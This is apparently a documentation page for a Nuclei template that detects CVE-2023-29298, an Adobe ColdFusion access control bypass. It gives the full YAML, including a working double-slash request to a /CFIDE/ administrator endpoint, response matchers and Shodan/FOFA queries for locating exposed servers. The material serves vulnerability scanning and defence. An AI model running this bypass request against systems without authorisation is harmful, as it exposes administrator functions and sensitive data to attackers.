Adobe ColdFusion - Access Control Bypass
ID: CVE-2023-29298
Severity: high
Author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch
Tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev
Description
Section titled “Description”An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.
YAML Source
Section titled “YAML Source”id: CVE-2023-29298
info: name: Adobe ColdFusion - Access Control Bypass author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch severity: high description: | An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install. impact: | Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the latest security patches or updates provided by Adobe to fix the access control bypass vulnerability. reference: - https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/ - https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html - https://github.com/Ostorlab/KEV - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors - https://github.com/XRSec/AWVS-Update classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.94803 epss-percentile: 0.99269 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: coldfusion shodan-query: - http.component:"Adobe ColdFusion" - http.component:"adobe coldfusion" - http.title:"coldfusion administrator login" - cpe:"cpe:2.3:a:adobe:coldfusion" fofa-query: - app="Adobe-ColdFusion" - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev
http: - method: GET path: - "{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"
matchers-condition: and matchers: - type: regex regex: - ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}
- type: dsl dsl: - contains(content_type, "text/html") - status_code == 200 - len(trim_space(body)) == 106 condition: and# digest: 4b0a004830460221009fd02b7f1abf1509ef4815aa04622b390597d5249f10d3ba3099ae559d34c457022100aebfe3557ea6399bb442097f3c0efe3e88a52590245a5bd40804c6cd74837566:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-29298.yaml"